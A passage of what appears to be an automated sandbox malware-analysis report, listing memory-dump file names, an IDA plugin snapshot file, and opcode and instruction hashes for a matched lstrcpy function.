                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 713aedbb7c00f16b384ccd8c0727964914cea63ee44683a02c1ac8c3385b3f31
                            • Instruction ID: 3d77c8001372a0c32778e1fa21a893286fe824558834ff66e960331d7cb8f120
                            • Opcode Fuzzy Hash: 713aedbb7c00f16b384ccd8c0727964914cea63ee44683a02c1ac8c3385b3f31
                            • Instruction Fuzzy Hash: 88110074A11B039BDB289F79D85C927BBF8FF44701708496DA496C3B80EB31E801CBA0